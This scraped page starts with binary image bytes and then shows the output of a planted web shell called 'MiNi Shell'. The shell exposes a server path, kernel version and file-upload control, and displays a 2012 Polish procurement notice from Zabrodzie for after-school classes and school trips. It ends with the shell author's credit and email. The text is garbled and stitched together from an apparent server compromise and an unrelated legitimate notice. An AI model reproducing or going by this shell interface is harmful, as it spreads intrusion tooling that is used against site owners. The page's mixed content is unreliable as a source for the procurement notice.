JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120612/128645-N-2012.html

<p class="kh_header"><b>Zabrodzie: Przeprowadzenie zajęć dodatkowych oraz wyjazdów edukacyjnych dla dzieci z Publicznej Szkoły Podstawowej im. Marii Konopnickiej w Zabrodziu oraz Publicznego Gimnazjum im. Kard. Stefana Wyszyńskiego w Zabrodziu w ramach projektu Szkoła Równych Szans Programy Rozwojowe Szkół - IV edycja bis</b><br>
<b>Numer ogłoszenia: 128645 - 2012; data zamieszczenia: 12.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Zabrodziu , ul. Wł. St. Reymonta 51, 07-230 Zabrodzie, woj. mazowieckie, tel. 029 757 12 28, faks 029 757 12 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zabrodzie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć dodatkowych oraz wyjazdów edukacyjnych dla dzieci z Publicznej Szkoły Podstawowej im. Marii Konopnickiej w Zabrodziu oraz Publicznego Gimnazjum im. Kard. Stefana Wyszyńskiego w Zabrodziu w ramach projektu Szkoła Równych Szans Programy Rozwojowe Szkół - IV edycja bis.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług edukacyjnych polegających na przeprowadzeniu zajęć dodatkowych oraz wyjazdów edukacyjnych dla dzieci z Publicznej Szkoły Podstawowej im. Marii Konopnickiej w Zabrodziu oraz Publicznego Gimnazjum im. Kard. Stefana Wyszyńskiego w Zabrodziu w ramach projektu Szkoła Równych Szans Programy Rozwojowe Szkół - IV edycja bis, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki.
80.00.00.00-4 - usługi edukacyjne i szkoleniowe
80.31.00.00-0 - usługi edukacji młodzieży
80.10.00.00-5 - usługi szkolnictwa podstawowego

Zamawiający wymaga aby prowadzenie zajęć w ramach projektu, odbywało się poza godzinami obligatoryjnymi dla poszczególnych uczniów w dniach od poniedziałku do piątku w ramach planu zajęć w danej placówce. W szczególnie uzasadnionych przypadkach dopuszcza się prowadzenie zajęć także w soboty, po wcześniejszym uzgodnieniu z Zamawiającym.

Do obowiązków Wykonawcy należeć będzie w szczególności:
-	opracowanie w terminie do 14 dni od daty zawarcia umowy o udzielenie zamówienia planu pracy zajęć pozalekcyjnych (obejmującego harmonogram i zakres) i przedstawienie do akceptacji Zamawiającemu, po wcześniejszym uzgodnieniu z dyrektorami odpowiednich placówek oświatowych
-	harmonogram będzie aktualizowany każdorazowo w przypadku zmiany planu lekcji
-	prowadzenie zajęć pozalekcyjnych zgodnie z zatwierdzonym planem pracy w terminach: od czerwca  2012r. do marca 2014r.
-	dokumentowanie zajęć pozalekcyjnych w dzienniku zajęć
-	prowadzenie dokumentacji zgodnie z wzorami przedstawionymi przez Zamawiającego
-	przeprowadzenie ewaluacji zajęć
-	decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć
-	ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy
-	prowadzenie na bieżąco kart ewidencji czasu pracy wskazujących liczbę zrealizowanych godzin dydaktycznych. Karty czasu pracy składane będą w wersji papierowej do siedziby zamawiającego
-	przestrzegania zasady równości szans, w tym równości płci w czasie przeprowadzanych zajęć edukacyjnych w ramach realizacji przedmiotu zamówienia.

Szczegółowy opis przedmiotu zamówienia
Jednostka 1h w SIWZ używana jest w rozumieniu 1 godziny lekcyjnej, czyli 45 minut. 
Zamówienie będzie realizowane w następujących szkołach i specjalnościach:
Publiczna Szkoła Podstawowa im. Marii Konopnickiej w Zabrodziu
Zajęcia dodatkowe:
	przeprowadzenie zajęć w ramach koła czytelniczego Spotkania z książką dla klas I-III - 65 godzin 
(rok 2012 - 16 godzin, rok 2013 - 40 godzin, rok 2014 - 9 godzin)
	przeprowadzenie warsztatów teatralnych Na scenie i za kulisami dla klas IV-VI - 65 godzin 
(rok 2012 - 16 godzin, rok 2013 - 40 godzin, rok 2014 - 9 godzin)
	przeprowadzenie zajęć w ramach koła plastycznego Szkolna galeria twórczości dla klas IV-VI - 50 godzin (rok 2012 - 10 godzin, rok 2013 - 33 godziny, rok 2014 - 7 godzin)
	przeprowadzenie zajęć w ramach koła małego aktora Mali artyści wielka sztuka dla klas I-III - 65 godzin (rok 2012 - 16 godzin, rok 2013 - 40 godzin, rok 2014 - 9 godzin)
	przeprowadzenie zajęć dydaktyczno-wyrównawczych z matematyki dla klas IV-VI - 65 godzin 
(rok 2012 - 16 godzin, rok 2013 - 40 godzin, rok 2014 - 9 godzin)
	przeprowadzenie zajęć wyrównawczych z języka angielskiego dla klas IV-VI - 65 godzin 
(rok 2012 - 16 godzin, rok 2013 - 40 godzin, rok 2014 - 9 godzin)
	przeprowadzenie zajęć wyrównawczych z matematyki podczas obozu letniego w 2012 roku - 18 godzin
	przeprowadzenie zajęć wyrównawczych z języka angielskiego podczas obozu letniego w 2012 roku  - 18 godzin
	przeprowadzenie zajęć z języka angielskiego podczas obozu letniego w 2013 roku- 36 godzin
	przeprowadzenie zajęć w ramach koła informatycznego Obiektyw z wykorzystaniem technik multimedialnych, komputera i internetu dla klas IV-VI - 50 godzin (rok 2012 - 10 godzin, rok 2013 - 33 godziny, rok 2014 - 7 godzin)
	przeprowadzenie zajęć w ramach koła matematycznego Zostań profesjonalnym matematykiem dla klas IV-VI - 65 godzin (rok 2012 - 16 godzin, rok 2013 - 40 godzin, rok 2014 - 9 godzin) 
	przeprowadzenie zajęć w ramach koła technicznego Dzieje wynalazków technicznych i ich wpływ na życie człowieka od czasów najdawniejszych po nowożytne dla klas IV-VI - 50 godzin  (rok 2012 - 10 godzin, rok 2013 - 33 godziny, rok 2014 - 7 godzin)
	przeprowadzenie zajęć w ramach koła przyrodniczego z elementami wiedzy astronomicznej i geograficznej dla klas IV-VI - 65 godzin (rok 2012 - 16 godzin, rok 2013 - 40 godzin, rok 2014 - 9 godzin)
	przeprowadzenie zajęć ciekawa matematyka - uczenie się matematyki metodą projektu matematycznego z wykorzystaniem technik multimedialnych dla klas V-VI - 30 godzin (rok 2012 - 10 godzin, rok 2013 - 20 godzin)
	poprowadzenie świetlicy opiekuńczo-wychowawczej z elementami zajęć terapeutycznych i tematyki ekologicznej - zdrowotnej dla uczniów klas I-III - 100 godzin (rok 2012 - 28 godzin, rok 2013 - 60 godzin, rok 2014 - 12 godzin)
	przeprowadzenie zajęć w ramach odrabianki w szkole dla klas I-III - 100 godzin (rok 2012 - 28 godzin, rok 2013 - 60 godzin, rok 2014 - 12 godzin)
	przeprowadzenie zajęć reedukacyjno-terapeutycznych dla klas IV-VI - 65 godzin (rok 2012 - 16 godzin, rok 2013 - 40 godzin, rok 2014 - 9 godzin)
	opieka psychologiczno-pedagogiczną nad uczniami objętymi terapią pedagogiczną - 40 godzin (rok 2012 - 11 godzin, rok 2013 - 23 godzin, rok 2014 - 6 godzin)
Wycieczki dydaktyczne:
	zorganizowanie obozu letniego nad morzem Bałtyckim w 2012 roku. Wykonawca będzie zapewniał: wyżywienie, noclegi, transport) oraz  opiekę 3 opiekunów oraz ratownika na plaży) - 43 osoby. Czas trwania obozu 6 dni (5 noclegów), 
	zorganizowanie obozu letniego nad morzem w 2013 roku. Wykonawca będzie zapewniał: wyżywienie, noclegi, transport) oraz  opiekę 3 opiekunów oraz ratownika na plaży) - 43 osoby. Czas trwania obozu 6 dni (5 noclegów)
	zorganizowanie 3 jednodniowych wycieczek do teatrów warszawskich w ramach warsztatów teatralnych Na scenie i za kulisami dla klas IV-VI (w tym: transport, bilety wstępu i opieka 3 opiekunów) - 135 osób. Jeden wyjazd w 2012 roku oraz dwa wyjazdy w 2013 roku.
	zorganizowanie 3 jednodniowych wycieczek do teatrów warszawskich w ramach koła małego aktora Mali artyści wielka sztuka dla klas I-III (w tym: transport, bilety wstępu i opieka 3 opiekunów)- 135 osób. Jeden wyjazd w 2012 roku oraz dwa wyjazdy w 2013 roku.
	zorganizowanie jednodniowej wycieczki do Puszczy Kampinoskiej w 2013 roku w ramach koła przyrodniczego z elementami wiedzy astronomicznej i geograficznej dla klas IV-VI (w tym: transport, bilety wstępu i opieka 3 opiekunów) - 45 osób. 
	zorganizowanie jednodniowej wycieczki do Powsina w 2013 roku w ramach koła przyrodniczego z elementami wiedzy astronomicznej i geograficznej dla klas IV-VI (w tym: transport, bilety wstępu i opieka 3 opiekunów) - 45 osób
	zorganizowanie jednodniowej wycieczki do Ciechanowca w 2013 roku w ramach koła technicznego Dzieje wynalazków technicznych i ich wpływ na życie człowieka od czasów najdawniejszych po nowożytne dla klas IV-VI (w tym: transport, bilety wstępu i opieka 3 opiekunów) - 45 osób
	zorganizowanie jednodniowej wycieczki do Muzeum Techniki w 2013 roku w Warszawie w ramach koła technicznego Dzieje wynalazków technicznych i ich wpływ na życie człowieka od czasów najdawniejszych po nowożytne dla klas IV-VI (w tym: transport, bilety wstępu i opieka 3 opiekunów) - 45 osób

 Publiczne Gimnazjum im. Kard. Stef. Wyszyńskiego w Zabrodziu:
Zajęcia dodatkowe:
	przeprowadzenie zajęć dydaktyczno-wyrównawczych z matematyki, chemii, biologii, geografii, fizyki i języka polskiego - 360 godzin (rok 2012 - 60 godzin, rok 2013 - 270 godzin, rok 2014 - 30 godzin)
	przeprowadzenie zajęć w ramach koła języka angielskiego - 240 godzin (rok 2012 - 30 godzin, rok 2013 - 190 godzin, rok 2014 - 20 godzin)
	przeprowadzenie zajęć w ramach działania Pomoc w odrabianiu prac domowych - 270 godzin (rok 2012 - 50 godzin, rok 2013 - 200 godzin, rok 2014 - 20 godzin)
	przeprowadzenie zajęć w ramach koła literackiego - 120 godzin (rok 2012 - 10 godzin, rok 2013 - 100 godzin, rok 2014 - 10 godzin)
	przeprowadzenie zajęć w ramach koła informatycznego - 20 godzin (rok 2012 - 5 godzin, rok 2013 - 10 godzin, rok 2014 - 5 godzin)
	przeprowadzenie zajęć psychologiczno-pedagogicznych - 20 godzin (rok 2012 - 5 godzin, rok 2013 - 10 godzin, rok 2014 - 5 godzin)
Wycieczki dydaktyczne:
	pięciodniowa wycieczka w góry w ramach koła literackiego w 2013 roku (cztery noclegi). Wykonawca będzie zapewniał: wyżywienie, noclegi, transport, bilety wstępu (muzeum, itp.) i opieka 5 opiekunów) - 50 osób
	jednodniowa wycieczka do Centrum Nauki Kopernik w ramach zajęć dydaktyczno-wychowawczych w 2012 roku (w tym: wyżywienie, transport, bilety wstępu i opieka 3 opiekunów) - 48 osób
	jednodniowa wycieczka do Białowieży w ramach zajęć dydaktyczno-wychowawczych w 2012 roku (w tym: wyżywienie, transport, bilety wstępu i opieka 3 opiekunów) - 48 osób
	jednodniowa wycieczka do Warszawy w 2013 roku (w tym: wyżywienie, transport, bilety wstępu i opieka 3 opiekunów)- 48 osób.
	pięć wyjazdów na basen w ramach zajęć Uczymy się pływać (w tym: transport, bilety wstępu i opieka 2 opiekunów) - 150 osób. Jeden wyjazd w 2012 roku, trzy wyjazdy w 2013 roku oraz jeden wyjazd w 2014 roku.
	osiem wyjazdów do teatrów i kin w ramach zajęć koła literackiego  (w tym: transport, bilety wstępu i opieka 3 opiekunów) - 384 osoby. Dwa wyjazdy w 2012 roku, pięć wyjazdów w 2013 roku oraz dwa wyjazdy w 2014 roku.
W przypadku wyjazdów trwających dłużej niż jeden dzień wykonawca zobowiązany jest zapewnić:
	zakwaterowanie uczestnikom oraz opiekunom w pokojach 2-4 osobowych z pełnym węzłem sanitarnym
	opiekę, ratownika
	pełne wyżywienie składające się w trakcie pobytu z trzech posiłków dziennie + podwieczorka natomiast w dniu wyjazdu z obiadu oraz kolacji, w dniu powrotu śniadania, obiadu oraz suchego prowiantu na drogę powrotną)
	opiekę medyczną w miejscu prowadzenia zajęć
	Autobus przewożący uczniów musi mieć co najmniej 49 miejsc siedzących. Wykonawca zobowiązany będzie do zapewnienia autobusu o podwyższonym standardzie (tv, klimatyzacja)
	Każdorazowy program wyjazdu do akceptacji zamawiającego.
	Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczestników podczas wyjazdów oraz obozu letniego.

Osoby prowadzące zajęcia muszą posiadać odpowiednie kwalifikacje do prowadzenia poszczególnych zajęć. Przed podpisaniem umowy wykonawca zobowiązany będzie do przedstawienia dokumentów potwierdzających posiadane kwalifikacje.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia - zał. nr 2 do SIWZ na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia - zał. nr 2 do SIWZ na zasadzie spełnia/nie spełnia oraz na podstawie Wykazu usług,- zał. nr 4 do SIWZ na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia - zał. nr 2 do specyfikacji istotnych warunków zamówienia na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia - zał. nr 2 do specyfikacji istotnych warunków zamówienia na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia - zał. nr 2 do specyfikacji istotnych warunków zamówienia na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wystąpienia zmiany przedmiotu lub terminu wykonania zamówienia w następujących przypadkach:
-	z powodu wystąpienia opóźnienia rozstrzygnięcia postępowania przetargowego,
-	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego,
-	z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody,
-	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,
-	w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron
-	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie z SIWZ - Zamawiający dopuszcza możliwość zmiany umowy,
-	zamawiający dopuszcza możliwość wystąpienia zmian w zakresie ilości uczestników zajęć  oraz ilości kilometrów po dokonaniu wyboru dokładnego miejsca wyjazdów oraz naboru uczestników.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zabrodzie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Zabrodziu, ul. Wł. St. Reymonta 51, 07-230 Zabrodzie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2012 godzina 09:00, miejsce: Urząd Gminy w Zabrodziu, ul. Wł. St. Reymonta 51, 07-230 Zabrodzie (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com